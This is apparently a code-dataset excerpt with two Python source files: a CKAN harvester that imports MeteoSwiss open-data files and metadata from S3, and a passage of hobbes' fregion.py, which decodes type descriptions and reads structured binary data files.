repo_name
stringlengths 5
92
| path
stringlengths 4
232
| copies
stringclasses 19
values | size
stringlengths 4
7
| content
stringlengths 721
1.04M
| license
stringclasses 15
values | hash
int64 -9,223,277,421,539,062,000
9,223,102,107B
| line_mean
float64 6.51
99.9
| line_max
int64 15
997
| alpha_frac
float64 0.25
0.97
| autogenerated
bool 1
class |
---|---|---|---|---|---|---|---|---|---|---|
ogdch/ckanext-meteoswiss | ckanext/meteoswiss/harvesters/meteoswissharvester.py | 1 | 13076 | #n -*- coding: utf-8 -*-
import json
import os
import tempfile
from uuid import NAMESPACE_OID, uuid4, uuid5
from boto.s3.connection import S3Connection
from boto.s3.key import Key
from ckan import model
from ckan.model import Session
from ckan.logic import get_action, action
from ckan.lib.munge import munge_title_to_name
from ckanext.harvest.model import HarvestObject
from ckanext.harvest.harvesters import HarvesterBase
from pylons import config
from ..helpers.metadata import MetaDataParser
import logging
log = logging.getLogger(__name__)
class MeteoswissHarvester(HarvesterBase):
'''
The harvester for meteoswiss
'''
HARVEST_USER = u'harvest'
METADATA_FILE_NAME = u'OGD@Bund_Metadaten_MeteoSchweiz_rig_V3 6.xlsx'
METADATA_FILE_PATH = (
u'ch.meteoschweiz.normwerttabellen/%s'
% METADATA_FILE_NAME
)
BUCKET_NAME = config.get('ckanext.meteoswiss.bucket_name')
AWS_ACCESS_KEY = config.get('ckanext.meteoswiss.access_key')
AWS_SECRET_KEY = config.get('ckanext.meteoswiss.secret_key')
SHEETS = (
# Sheet name # Use GM03 descriptions
(u'SMN', False),
(u'SMN-precip', False),
(u'Föhnindex', False),
(u'HomogeneDaten', False),
(u'Klimanormwerte', True),
#(u'Kamerabild', True),
)
S3_PREFIXES = {
u'SMN': 'ch.meteoschweiz.swissmetnet',
u'SMN-precip': 'ch.meteoschweiz.swissmetnet-niederschlag',
u'Föhnindex': 'ch.meteoschweiz.swissmetnet-foehnindex',
u'HomogeneDaten': 'ch.meteoschweiz.homogenereihen',
u'Klimanormwerte': 'ch.meteoschweiz.normwerttabellen',
u'Kamerabild': 'ch.meteoschweiz.kamerabilder',
}
ORGANIZATION = {
'de': {
'name': (
u'Bundesamt für Meteorologie '
u'und Klimatologie MeteoSchweiz'
),
'description': (
u'Der nationale Wetter- und Klimadienst. Messstationen, '
u'Wetterradars und Satelliten überwachen das Wetter. '
u'Aus den Messdaten erstellt MeteoSchweiz Prognosen, '
u'Warnungen und Klimaanalysen.'
),
'website': u'http://www.meteoschweiz.admin.ch/'
},
'fr': {
'name': (
u'Office fédéral de météorologie '
u'et de climatologie MétéoSuisse'
),
'description': (
u'Le service météorologique et climatologique national. '
u'A partir de l\'ensemble des stations de mesure, des '
u'radars météorologiques et des satellites MétéoSuisse '
u'élabore pronostics, alertes et analyse climatiques.'
)
},
'it': {
'name': (
u'Ufficio federale di meteorologia e '
u'climatologia MeteoSvizzera'
),
'description': (
u'Il servizio nazionale di meteorologia e climatologia. '
u'Sulla base di dati di stazioni di rilevamento, radar '
u'meteorologici e satelliti MeteoSvizzera elabora previsioni '
u'del tempo, allerte e le analisi climatologiche.'
)
},
'en': {
'name': (
u'Federal Office of Meteorology and '
u'Climatology MeteoSwiss'
),
'description': (
u'The national weather and climate service. Meteorological '
u'stations, weather radars and satellites monitor the '
u'weather. Using the collected data, MeteoSwiss generates '
u'forecasts, warnings and climate analyses.'
)
}
}
GROUPS = {
u'de': [u'Raum und Umwelt'],
u'fr': [u'Espace et environnement'],
u'it': [u'Territorio e ambiente'],
u'en': [u'Territory and environment']
}
def _get_s3_bucket(self):
'''
Create an S3 connection to the department bucket
'''
if not hasattr(self, '_bucket'):
try:
conn = S3Connection(self.AWS_ACCESS_KEY, self.AWS_SECRET_KEY)
self._bucket = conn.get_bucket(self.BUCKET_NAME)
except Exception, e:
log.exception(e)
raise e
return self._bucket
def _fetch_metadata_file(self):
'''
Fetching the Excel metadata file from the S3 Bucket and save on disk
'''
try:
temp_dir = tempfile.mkdtemp()
metadata_file = Key(self._get_s3_bucket())
metadata_file.key = self.METADATA_FILE_PATH
metadata_file_path = os.path.join(
temp_dir,
self.METADATA_FILE_NAME
)
metadata_file.get_contents_to_filename(metadata_file_path)
return metadata_file_path
except Exception, e:
log.exception(e)
raise
def _get_s3_resources(self, resources, s3_prefix):
'''
Lookup all files on S3, an match them with meta descriptions
'''
result = []
for key in self._get_s3_bucket().list(s3_prefix):
path = key.name.split('/')
# Skip metadata file
if key.name == self.METADATA_FILE_PATH:
continue
if len(path) >= 2 and path[0] == s3_prefix and key.size > 0:
url = key.generate_url(0, query_auth=False, force_http=True)
name = os.path.basename(key.name)
data = {
u'url': url,
u'name': name,
u'format': self._guess_format(name),
}
description = self._description_lookup(resources, name)
if description:
data.update({u'description': description})
result.append(data)
return result
def _guess_format(self, path):
return os.path.splitext(path.lower())[1][1:]
def _description_lookup(self, resources, filename):
'''
Check if metafile declared a description to this resource
'''
basename, ext = os.path.splitext(filename)
for resource in resources:
if basename in resource.get('id', ''):
return resource.get('description')
if basename in resource.get('Standort', ''):
return resource.get('description')
def info(self):
return {
'name': 'meteoswiss',
'title': 'Meteoswiss',
'description': 'Harvests the meteoswiss data',
'form_config_interface': 'Text'
}
def gather_stage(self, harvest_job):
log.debug('In Meteoswiss gather_stage')
file_path = self._fetch_metadata_file()
ids = []
for sheet_name, use_gm03_desc in self.SHEETS:
log.debug('Gathering %s' % sheet_name)
parser = MetaDataParser(file_path)
metadata = parser.parse_sheet(sheet_name, use_gm03_desc)
metadata['translations'].extend(self._metadata_term_translations())
metadata['sheet_name'] = sheet_name
obj = HarvestObject(
job=harvest_job,
content=json.dumps(metadata)
)
obj.save()
ids.append(obj.id)
return ids
def fetch_stage(self, harvest_object):
log.debug('In Meteoswiss fetch_stage')
package_dict = json.loads(harvest_object.content)
sheet_name = package_dict.get('sheet_name')
s3_prefix = self.S3_PREFIXES.get(sheet_name)
if s3_prefix:
log.debug('Loading S3 Resources for %s' % sheet_name)
package_dict['resources'] = self._get_s3_resources(
package_dict.get('resources', []),
s3_prefix
)
harvest_object.content = json.dumps(package_dict)
harvest_object.save()
return True
def _create_uuid(self, name=None):
'''
Create a new SHA-1 uuid for a given name or a random id
'''
if name:
new_uuid = uuid5(NAMESPACE_OID, str(name))
else:
new_uuid = uuid4()
return unicode(new_uuid)
def import_stage(self, harvest_object):
log.debug('In Meteoswiss import_stage')
if not harvest_object:
log.error('No harvest object received')
return False
try:
package_dict = json.loads(harvest_object.content)
user = model.User.get(self.HARVEST_USER)
context = {
'model': model,
'session': Session,
'user': self.HARVEST_USER
}
package_dict['id'] = self._create_uuid(package_dict.get('id'))
# Find or create group the dataset should get assigned to
package_dict['groups'] = self._find_or_create_groups(context)
# Find or create the organization
# the dataset should get assigned to
package_dict['owner_org'] = self._find_or_create_organization(
context
)
# because license_url does not exist, we save it in extras for now
extras = []
if 'licence_url' in package_dict:
extras.append(('license_url', package_dict['licence_url']))
elif 'license_url' in package_dict:
extras.append(('license_url', package_dict['license_url']))
package_dict['extras'] = extras
log.debug('Extras %s' % extras)
# Never import state from data source!
if 'state' in package_dict:
del package_dict['state']
# Split tags
tags = package_dict.get('tags', '').split(',')
tags = [tag.strip() for tag in tags]
if '' not in tags and '(tbd)' not in tags:
package_dict['tags'] = tags
else:
del package_dict['tags']
package = model.Package.get(package_dict['id'])
model.PackageRole(
package=package,
user=user,
role=model.Role.ADMIN
)
#log.debug('Save or update package %s' % (package_dict['name'],))
self._create_or_update_package(package_dict, harvest_object)
log.debug('Save or update term translations')
self._submit_term_translations(context, package_dict)
Session.commit()
except Exception, e:
log.exception(e)
raise e
return True
def _find_or_create_groups(self, context):
group_name = self.GROUPS['de'][0]
data_dict = {
'id': group_name,
'name': munge_title_to_name(group_name),
'title': group_name
}
try:
group = get_action('group_show')(context, data_dict)
except:
group = get_action('group_create')(context, data_dict)
log.info('created the group ' + group['id'])
group_ids = []
group_ids.append(group['id'])
return group_ids
def _find_or_create_organization(self, context):
try:
data_dict = {
'permission': 'edit_group',
'id': munge_title_to_name(self.ORGANIZATION['de']['name']),
'name': munge_title_to_name(self.ORGANIZATION['de']['name']),
'title': self.ORGANIZATION['de']['name'],
'description': self.ORGANIZATION['de']['description'],
'extras': [
{
'key': 'website',
'value': self.ORGANIZATION['de']['website']
}
]
}
organization = get_action('organization_show')(context, data_dict)
except:
organization = get_action('organization_create')(
context,
data_dict
)
return organization['id']
def _metadata_term_translations(self):
'''
Generate term translatations for organizations
'''
try:
translations = []
for lang, org in self.ORGANIZATION.items():
if lang != 'de':
for field in ['name', 'description']:
translations.append({
'lang_code': lang,
'term': self.ORGANIZATION['de'][field],
'term_translation': org[field]
})
return translations
except Exception, e:
log.exception(e)
raise
def _submit_term_translations(self, context, package_dict):
for translation in package_dict['translations']:
action.update.term_translation_update(context, translation)
| agpl-3.0 | -5,317,946,303,690,557,000 | 32.14467 | 79 | 0.532353 | false |
Morgan-Stanley/hobbes | scripts/fregion.py | 1 | 33452 | #!/usr/bin/env python
########################################################
#
# fregion.py : read structured data files
#
# to load a file from the path P into the variable f:
# f = fregion.FRegion(P)
#
# to read the stored field 'x' out of f:
# f.x
#
# to read the 'metadata' for the field 'x' (type and offset details):
# meta(f).x
#
# There are 2 ways to add reading support for a custom user type:
# 1.
# fregion.FRegion.addType("MyTypeName", lambda renv, td, repty: makeMyTypeNameReader(renv,td,repty))
# where:
# 'renv' will be the "reader environment" (necessary for any call to makeReader)
# 'td' will be the full type description where "MyTypeName" appears at root (e.g. for 'fileref', App(Prim('fileref', ...), [Arr(Prim('char'))]))
# 'repty' will be the determined 'representation type' (which can also be determined through 'td')
# and:
# the returned 'reader' must be a class with a "read" function like:
# def read(self,m,o):
# where
# 'm' will give access to the memory for the file being read out of
# 'o' will be the memory offset where the value to be read is placed
# and:
# the returned value may be whatever the application decides is sensible
#
# 2. Just use the decorator RegReader like:
# @RegReader("MyTypeName")
# class MyTypeReader:
# def __init__(self, renv, ty, repty):
# pass
# def read(self, m, offset):
# pass
#
########################################################
import os
import mmap
import struct
import math
import datetime
import uuid
import base64
#######
#
# useful tools
#
#######
class Loader:
"""
Lazy loading data from file
"""
def __init__(self, fn, *args, **kw):
self.fn = fn
self.args = args
self.kw = kw
def __getitem__(self, k):
if self.fn:
return self.fn(*self.args, **self.kw)[k]
return None
def __call__(self):
if self.fn:
v = self.fn(*self.args, **self.kw)
if isinstance(v, ArrReaderGenerator):
return v()
return v
return None
@property
def value(self):
if self.fn:
return self.fn(*self.args, **self.kw)
return None
def __str__(self):
return "{}".format(self.fn(*self.args, **self.kw))
def reader(self):
return self.fn.im_self
def LazyRead(enable):
"""
decorator to config lazy read function
"""
def apply(func):
def wrapper(*args, **kw):
return Loader(func, *args, **kw)
if enable:
return wrapper
else:
return func
return apply
#######
#
# Type Descriptions
#
#######
class Prim:
def __init__(self, name, rep):
self.name = name
self.rep = rep
def __eq__(self,x): return isinstance(x,Prim) and self.name==x.name and self.rep==x.rep
def __repr__(self): return '()' if self.name=="unit" else self.name
class Var:
def __init__(self, name):
self.name = name
def __eq__(self,x): return isinstance(x,Var) and self.name==x.name
def __repr__(self): return self.name
class FixedArr:
def __init__(self, ty, tlen):
self.ty = ty
self.tlen = tlen
def __eq__(self,x): return isinstance(x,FixedArr) and self.ty==x.ty and self.tlen==x.tlen
def __repr__(self): return '[:' + str(self.ty) + '|' + str(self.tlen) + ':]'
class Arr:
def __init__(self, ty):
self.ty = ty
def __eq__(self,x): return isinstance(x,Arr) and self.ty==x.ty
def __repr__(self): return '[' + str(self.ty) + ']'
class Variant:
def __init__(self, ctors):
self.ctors = ctors
def __eq__(self,x): return isinstance(x,Variant) and self.ctors==x.ctors
def __repr__(self):
if (len(self.ctors) == 0):
return 'void'
elif (self.isSum()):
return self.showAsSum()
else:
return self.showAsVariant()
def isSum(self):
return len(self.ctors)>0 and self.ctors[0][0][0] == '.'
def showAsSum(self):
s = '('
s += str(self.ctors[0][2])
for i in range(1, len(self.ctors)):
s += '+' + str(self.ctors[i][2])
s += ')'
return s
def showAsVariant(self):
s = '|'
s += self.descCtor(self.ctors[0])
for i in range(1,len(self.ctors)):
s += ', '
s += self.descCtor(self.ctors[i])
s += '|'
return s
def descCtor(self, ctor):
return ctor[0] + ':' + str(ctor[2])
class Struct:
def __init__(self, fields):
self.fields = fields
def __eq__(self,x): return isinstance(x,Struct) and self.fields==x.fields
def __repr__(self):
if (len(self.fields) == 0):
return '()'
elif (self.isTuple()):
return self.showAsTuple()
else:
return self.showAsStruct()
def isTuple(self):
return len(self.fields)>0 and self.fields[0][0][0] == '.'
def showAsTuple(self):
s = '('
s += str(self.fields[0][2])
for i in range(1,len(self.fields)):
s += '*' + str(self.fields[i][2])
s += ')'
return s
def showAsStruct(self):
s = '{'
s += self.descField(self.fields[0])
for i in range(1,len(self.fields)):
s += ', '
s += self.descField(self.fields[i])
s += '}'
return s
def descField(self, field):
return field[0] + ':' + str(field[2])
class TLong:
def __init__(self, n):
self.n = n
def __eq__(self,x): return isinstance(x,TLong) and self.n==x.n
def __repr__(self): return str(self.n)
class App:
def __init__(self,f,args):
self.f = f
self.args = args
def __eq__(self,x): return isinstance(x,App) and self.f==x.f and self.args==x.args
def __repr__(self):
if (isinstance(self.f,Prim)):
if (self.f.name == "fileref" and len(self.args)>0):
return str(self.args[0])+"@?"
return self.showGeneric()
def showGeneric(self):
s = str(self.f) + '('
if (len(self.args)>0):
s += str(self.args[0])
for i in range(1,len(self.args)):
s += ', ' + str(self.args[i])
s += ')'
return s
class Recursive:
def __init__(self,vn,ty):
self.vn = vn
self.ty = ty
def __repr__(self):
return '^' + self.vn + '.' + str(self.ty)
class Abs:
def __init__(self,vns,ty):
self.vns = vns
self.ty = ty
def __repr__(self):
s = '\\'
if (len(self.vns)>0):
s += self.vns[0]
for i in range(1,len(self.vns)):
s += ', ' + self.vns[i]
s += '.' + str(self.ty)
return s
class TyCase:
def __init__(self, dtors):
self.dtors = dtors
def apply(self,ty):
if (isinstance(ty,Prim)):
return self.dtors["prim"](ty)
elif (isinstance(ty,Var)):
return self.dtors["var"](ty)
elif (isinstance(ty,FixedArr)):
return self.dtors["farr"](ty)
elif (isinstance(ty,Arr)):
return self.dtors["arr"](ty)
elif (isinstance(ty,Variant)):
return self.dtors["variant"](ty)
elif (isinstance(ty,Struct)):
return self.dtors["struct"](ty)
elif (isinstance(ty,TLong)):
return self.dtors["long"](ty)
elif (isinstance(ty,App)):
return self.dtors["app"](ty)
elif (isinstance(ty,Recursive)):
return self.dtors["rec"](ty)
elif (isinstance(ty,Abs)):
return self.dtors["abs"](ty)
else:
raise Exception("Can't deconstruct unknown type description")
def fail(msg):
raise Exception(msg)
def dictWithout(m,k):
r=m.copy()
r.pop(k,None)
return r
def dictWithouts(m,ks):
r=m.copy()
for k in ks:
r.pop(k,None)
return r
def addFreeVar(m,vn):
m[vn]=None
def freeVarsInto(m,ty):
tyDisp = {
"prim": lambda p: None,
"var": lambda v: addFreeVar(m,v.name),
"farr": lambda fa: (freeVarsInto(m,fa.ty), freeVarsInto(m,fa.tlen)),
"arr": lambda a: freeVarsInto(m,a.ty),
"variant": lambda v: [freeVarsInto(m,ctor[2]) for ctor in v.ctors],
"struct": lambda s: [freeVarsInto(m,field[2]) for field in s.fields],
"long": lambda n: None,
"app": lambda a: (freeVarsInto(m,a.f), [freeVarsInto(m,arg) for arg in f.args]),
"rec": lambda r: m.update(dictWithout(freeVars(r.ty),r.vn)),
"abs": lambda a: m.update(dictWithouts(freeVars(a.ty),a.vns))
}
return TyCase(tyDisp).apply(ty)
def freeVars(ty):
m={}
freeVarsInto(m,ty)
return m
def dictFreeVars(m):
lm={}
for n, ty in m.items():
freeVarsInto(lm,ty)
return lm
def freeName(m):
vn='t0'
n=0
while (True):
if (not(vn in m)):
break
else:
n+=1
vn='t'+str(n)
return vn
def substituteInVariant(m,v):
ctors=[]
for ctor in v.ctors:
ctors.append((ctor[0], ctor[1], substitute(m, ctor[2])))
return Variant(ctors)
def substituteInStruct(m,s):
fields=[]
for field in s.fields:
fields.append((field[0], field[1], substitute(m,field[2])))
return Struct(fields)
def substituteInApp(m,a):
args=[]
for ty in a.args:
args.append(substitute(m,ty))
return App(substitute(m,a.f),args)
def substituteInRec(m,r):
lm=dictWithout(m,r.vn)
fvs=dictFreeVars(lm)
if (r.vn in fvs):
nn=freeName(fvs)
return Recursive(nn, substitute(lm, substitute({r.vn:Var(nn)},r.ty)))
else:
return Recursive(r.vn, substitute(lm, r.ty))
def substituteInAbs(m,a):
lm=dictWithouts(m,a.vns)
fvs=dictFreeVars(lm)
vns=[]
for vn in a.vns:
if (vn in fvs):
nn=freeName(lm)
lm[vn] = Var(nn)
vns.append(nn)
else:
vns.append(vn)
if (vns!=a.vns):
return Abs(vns, substitute(lm,a.ty))
else:
return Abs(a.vns, substitute(lm,a.ty))
def substitute(m,ty):
tyDisp = {
"prim": lambda p: Prim(p.name,substitute(m,p.rep)) if (p.rep != None) else p,
"var": lambda v: m[v.name] if (v.name in m.keys()) else v,
"farr": lambda fa: FixedArr(substitute(m,fa.ty), substitute(m,fa.tlen)),
"arr": lambda a: Arr(substitute(m,a.ty)),
"variant": lambda v: substituteInVariant(m,v),
"struct": lambda s: substituteInStruct(m,s),
"long": lambda n: n,
"app": lambda a: substituteInApp(m,a),
"rec": lambda r: substituteInRec(m,r),
"abs": lambda a: substituteInAbs(m,a)
}
return TyCase(tyDisp).apply(ty)
def expectFn(ty):
if (isinstance(ty,Prim)):
if (ty.rep == None):
if (ty.name == "fileref"):
return Abs(["t"], Prim("long",None))
else:
raise Exception("Expected function representation in place of primitive: " + ty.name)
else:
return expectFn(ty.rep)
elif (isinstance(ty,Abs)):
return ty
else:
raise Exception("Expected function in place of type: " + str(ty))
def evalApp(pf, args):
f = expectFn(pf)
if (len(args)!=len(f.vns)):
raise Exception("Arity mismatch in application (expected " + str(len(f.vns)) + " arguments): " + str(App(pf,args)))
m={}
for i in range(len(f.vns)):
m[f.vns[i]] = args[i]
return substitute(m, f.ty)
#######
#
# determine memory layout of any type
#
#######
def align(x, b):
if (x % b == 0):
return x
else:
return b*(int(x/b)+1)
def alignOfStruct(s):
a=1
for field in s.fields:
a=max(a,alignOf(field[2]))
return a
def alignOfVariant(v):
a=4
for ctor in v.ctors:
a=max(a,alignOf(ctor[2]))
return a
def alignOfApp(a):
return alignOf(evalApp(a.f, a.args))
def alignOf(ty):
tyDisp = {
"prim": lambda p: 1 if (p.name == "unit") else alignOf(p.rep) if (p.rep != None) else sizeOfPrim(p),
"var": lambda v: fail("Can't determine alignment of type variable: " + v.name),
"farr": lambda fa: alignOf(fa.ty),
"arr": lambda a: fail("Can't determine alignment of variable-length array: " + str(a)),
"variant": lambda v: alignOfVariant(v),
"struct": lambda s: alignOfStruct(s),
"long": lambda n: fail("Can't get alignment of type-level number: " + str(n.n)),
"app": lambda a: alignOfApp(a),
"rec": lambda r: fail("Can't get alignment of recursive type: " + str(r)),
"abs": lambda a: fail("Can't get alignment of type-level function: " + str(a))
}
return TyCase(tyDisp).apply(ty)
def sizeOfPrim(p):
if (p.rep != None):
return sizeOf(p.rep)
else:
if (p.name == "unit"):
return 0
elif (p.name == "bool"):
return 1
elif (p.name == "byte"):
return 1
elif (p.name == "char"):
return 1
elif (p.name == "short"):
return 2
elif (p.name == "int"):
return 4
elif (p.name == "long"):
return 8
elif (p.name == "float"):
return 4
elif (p.name == "double"):
return 8
else:
raise Exception("Can't determine size of unknown primitive type: " + p.name)
def sizeOfStruct(s):
o=0
for f in s.fields:
o = align(o, alignOf(f[2])) + sizeOf(f[2])
return align(o, alignOf(s))
def sizeOfVariant(v):
a=alignOf(v)
maxsz=0
for ctor in v.ctors:
maxsz=max(maxsz,sizeOf(ctor[2]))
return align(align(4,a)+maxsz,a)
def sizeOfApp(a):
return sizeOf(evalApp(a.f, a.args))
def sizeOf(ty):
tyDisp = {
"prim": lambda p: sizeOfPrim(p),
"var": lambda v: fail("Can't determine size of type variable: " + v.name),
"farr": lambda fa: sizeOf(fa.ty)*fa.tlen.n,
"arr": lambda a: fail("Can't determine size of variable-length array: " + str(a)),
"variant": lambda v: sizeOfVariant(v),
"struct": lambda s: sizeOfStruct(s),
"long": lambda n: fail("Can't get size of type-level number: " + str(n.n)),
"app": lambda a: sizeOfApp(a),
"rec": lambda r: fail("Can't get size of recursive type: " + str(r)),
"abs": lambda a: fail("Can't get size of type-level function: " + str(a))
}
return TyCase(tyDisp).apply(ty)
#######
#
# Type Description Decoding
#
#######
# a cheap cursor
class ReadPos:
def __init__(self):
self.pos = 0
def __repr__(self): return str(self.pos)
# type descriptions
TYCTOR_PRIM = 0
TYCTOR_TVAR = 2
TYCTOR_FIXEDARR = 4
TYCTOR_ARR = 5
TYCTOR_VARIANT = 6
TYCTOR_STRUCT = 7
TYCTOR_SIZE = 11
TYCTOR_TAPP = 12
TYCTOR_RECURSIVE = 13
TYCTOR_TABS = 15
def decodeBool(d, p):
b = struct.unpack('B', d[p.pos:p.pos+1])[0]
p.pos += 1
return b != 0
def decodeInt(d, p):
n = struct.unpack('I', d[p.pos:p.pos+4])[0]
p.pos += 4
return n
def decodeLong(d, p):
n = struct.unpack('Q', d[p.pos:p.pos+8])[0]
p.pos += 8
return n
def decodeStr(d, p):
n = decodeLong(d,p)
s = str(d[p.pos:p.pos+n])
p.pos += n
return s
def decodeTypeDesc(d, p):
c = decodeInt(d,p)
if (c == TYCTOR_PRIM):
name = decodeStr(d, p)
if (decodeBool(d, p)):
return Prim(name, decodeTypeDesc(d, p))
else:
return Prim(name, None)
elif (c == TYCTOR_TVAR):
name = decodeStr(d, p)
return Var(name)
elif (c == TYCTOR_FIXEDARR):
ty = decodeTypeDesc(d, p)
tlen = decodeTypeDesc(d, p)
return FixedArr(ty, tlen)
elif (c == TYCTOR_ARR):
ty = decodeTypeDesc(d, p)
return Arr(ty)
elif (c == TYCTOR_VARIANT):
n = decodeLong(d,p)
ctors = []
for i in range(n):
name = decodeStr(d,p)
cid = decodeInt(d,p)
ty = decodeTypeDesc(d,p)
ctors.append((name,cid,ty))
return Variant(ctors)
elif (c == TYCTOR_STRUCT):
n = decodeLong(d,p)
fields = []
for i in range(n):
name = decodeStr(d,p)
cid = decodeInt(d,p)
ty = decodeTypeDesc(d,p)
fields.append((name,cid,ty))
return Struct(fields)
elif (c == TYCTOR_SIZE):
return TLong(decodeLong(d,p))
elif (c == TYCTOR_TAPP):
f = decodeTypeDesc(d,p)
n = decodeLong(d,p)
args = []
for i in range(n):
args.append(decodeTypeDesc(d,p))
return App(f,args)
elif (c == TYCTOR_RECURSIVE):
vn = decodeStr(d,p)
ty = decodeTypeDesc(d,p)
return Recursive(vn,ty)
elif (c == TYCTOR_TABS):
n = decodeLong(d,p)
vns = []
for i in range(n):
vns.append(decodeStr(d,p))
ty = decodeTypeDesc(d,p)
return Abs(vns,ty)
else:
raise Exception('Not a supported type constructor ID: ' + str(c))
#######
#
# Version updates as type transforms (where possible)
#
#######
def V1toV2Type(ty):
tyDisp = {
"prim": lambda p: p if (p.rep == None) else Prim(p.name, V1toV2Type(p.rep)),
"var": lambda v: v,
"farr": lambda fa: FixedArr(V1toV2Type(fa.ty), V1toV2Type(fa.tlen)),
"arr": lambda a: App(Prim("darray", Abs(["t"], Prim("long", None))), [V1toV2Type(a.ty)]),
"variant": lambda v: Variant([(ctor[0], ctor[1], V1toV2Type(ctor[2])) for ctor in v.ctors]),
"struct": lambda s: Struct([(field[0], field[1], V1toV2Type(field[2])) for field in s.fields]),
"long": lambda n: n,
"app": lambda a: App(V1toV2Type(a.f), [V1toV2Type(arg) for arg in a.args]),
"rec": lambda r: Recursive(r.vn, V1toV2Type(r.ty)),
"abs": lambda a: Abs(a.vns, V1toV2Type(a.ty))
}
return TyCase(tyDisp).apply(ty)
#######
#
# File envelope decoding (read page data, environment data)
#
#######
# page entry decoding
def isEnvPage(p):
return (p >> 14) == 2
def availBytes(p):
return p & 0x3FFF
# a file variable definition
class EnvEntry:
def __init__(self, offset, ty):
self.offset = offset
self.ty = ty
def __repr__(self):
return str(self.ty) + "@" + str(self.offset)
# read file metadata
class FREnvelope:
def __init__(self, fpath):
self.p = fpath
self.f = open(self.p, 'r+b')
self.m = mmap.mmap(self.f.fileno(), 0, mmap.ACCESS_READ)
# make sure that the file header is what we expect
if (struct.unpack('I', self.m[0:4])[0] != 0x10A1DB0D):
raise Exception('Not a valid structured data file: ' + self.p)
self.pageSize = struct.unpack('H', self.m[4:6])[0]
self.version = struct.unpack('H', self.m[6:8])[0]
if (self.pageSize != 4096):
raise Exception('Expected 4K page size')
if (not(self.version in [1,2])):
raise Exception('Structured data file format version ' + str(self.version) + ' not supported')
# read the page data in this file
self.pages = []
self.readPageEntries(self.pages, 8, 4096)
# read the environment data in this file
self.env = dict([])
page=0
while (page < len(self.pages)):
if (isEnvPage(self.pages[page])):
page += self.readEnvPage(self.env, page)
else:
page += 1
# if reading the old format, we need to reinterpret recorded types
if (self.version == 1):
for vn, b in self.env.items():
b.ty = V1toV2Type(b.ty)
# read page data entries into the 'pages' argument
# if there is a link to a subsequent page to read page data from, follow it
def readPageEntries(self, pages, i, o):
k = i
e = o - 8
while (k < e):
p = struct.unpack('H', self.m[k:k+2])[0]
if (p == 0):
break
pages.append(p)
k += 2
n = struct.unpack('Q', self.m[e:e+8])[0]
if (n != 0):
self.readPageEntries(pages, n*4096, (n+1)*4096)
# read environment data into the 'env' argument out of 'page'
def readEnvPage(self, env, page):
initOffset = page * 4096
offset = initOffset
while (True):
offset = self.readEnvRecord(env, offset)
pos = offset - 1
tpage = int(pos / 4096)
rpos = (pos % 4096) + 1
if (rpos == (4096 - availBytes(self.pages[tpage]))):
break
return int(math.ceil((float(offset-initOffset))/4096.0))
def readEnvRecord(self, env, offset):
vpos = struct.unpack('Q', self.m[offset:offset+8])[0]
offset += 8
vnlen = struct.unpack('Q', self.m[offset:offset+8])[0]
offset += 8
vn = str(self.m[offset:offset+vnlen])
offset += vnlen
tylen = struct.unpack('Q', self.m[offset:offset+8])[0]
offset += 8
if (len(vn) > 0 and vn[0] != '.' and tylen > 0):
env[vn] = EnvEntry(vpos, decodeTypeDesc(self.m[offset:offset+tylen], ReadPos()))
offset += tylen
return offset
#######
#
# Read structured data
#
#######
class UnitReader:
def read(self,m,offset): return None
class UnpackReader:
def __init__(self,fmt,sz):
self.fmt = fmt
self.sz = sz
def read(self,m,offset):
return struct.unpack(self.fmt,m[offset:offset+self.sz])[0]
class FArrReader:
def __init__(self, renv, ty, c):
self.c = c
self.rdr = makeReader(renv, ty)
self.esz = sizeOf(ty)
def read(self,m,offset):
r=[]
o=offset
for i in range(self.c):
r.append(self.rdr.read(m,o))
o += self.esz
return r
def tupleReaders(renv, tys):
o = 0
os = []
rs = []
for ty in tys:
o = align(o, alignOf(ty))
os.append(o)
rs.append(makeReader(renv, ty))
o += sizeOf(ty)
return (os,rs)
class TupleReader:
def __init__(self, renv, tys):
os, rs = tupleReaders(renv, tys)
self.os = os
self.rs = rs
def read(self,m,offset):
vs=[]
for i in range(len(self.os)):
vs.append(self.rs[i].read(m,offset+self.os[i]))
return tuple(vs)
class StructView:
def __init__(self, fs, foffs, vs):
self.fs = fs
self.foffs = foffs
self.vs = vs
def __repr__(self):
r = '{'
if (len(self.vs)>0):
r += self.fs[0] + '=' + str(self.vs[0])
for i in range(1,len(self.vs)):
r += ', ' + self.fs[i] + '=' + str(self.vs[i])
r += '}'
return r
def __str__(self): return self.__repr__()
def __eq__(self,other):
if (not(isinstance(other,StructView))):
return False
else:
return self.fs == other.fs and self.vs == other.vs
def __getattr__(self, attr):
return self.vs[self.foffs[attr]].value
class StructReader:
def __init__(self, renv, fs, tys):
os, rs = tupleReaders(renv, tys)
self.fs = fs
self.os = os
self.rs = rs
foffs={}
for i in range(len(self.fs)):
foffs[self.fs[i]] = i
self.foffs = foffs
def read(self,m,offset):
vs=[]
for i in range(len(self.os)):
vs.append(Loader(self.rs[i].read ,m,offset+self.os[i]))
return StructView(self.fs, self.foffs, vs)
class MaybeReader:
def __init__(self, renv, ty):
self.poff = align(4, alignOf(ty))
self.tr = UnpackReader('I', 4)
self.jr = makeReader(renv, ty)
def read(self,m,offset):
t = self.tr.read(m,offset)
if (t == 0):
return None
else:
return self.jr.read(m,offset+self.poff)
class EnumView:
def __init__(self, ns, t):
self.ns = ns
self.t = t
def __repr__(self):
return '|' + str(self.ns.get(self.t)) + '|'
class EnumReader:
def __init__(self, ctors):
self.tr = UnpackReader('I',4)
ns={}
for ctor in ctors:
ns[ctor[1]] = ctor[0]
self.ns = ns
def read(self,m,offset):
t = self.tr.read(m,offset)
return EnumView(self.ns, t)
class VariantView:
def __init__(self, cn, value):
self.cn = cn
self.v = value
@property
def value(self):
return self.v()
def __repr__(self):
if (len(self.cn)>0 and self.cn[0] == '.'):
return "|" + self.cn[2:] + "=" + str(self.v) + "|"
else:
return "|" + self.cn + "=" + str(self.v) + "|"
class VariantReader:
def __init__(self, renv, ctors):
poff=4
crs={}
cns={}
for ctor in ctors:
poff = align(poff, alignOf(ctor[2]))
crs[ctor[1]] = makeReader(renv, ctor[2])
cns[ctor[1]] = ctor[0]
self.tr = UnpackReader('I', 4)
self.poff = poff
self.crs = crs
self.cns = cns
def read(self,m,offset):
t = self.tr.read(m,offset)
return VariantView(self.cns[t], Loader(self.crs[t].read, m, offset+self.poff))
class StrReader:
def __init__(self):
self.nr = UnpackReader('Q',8)
def read(self,m,offset):
n=self.nr.read(m,offset)
return m[offset+8:offset+8+n]
class ArrReaderGenerator:
def __init__(self, m, reader, size, offset):
self.r = reader.r
self.size = size
self.offset = offset
self.m = m
self.vlen = reader.vlen
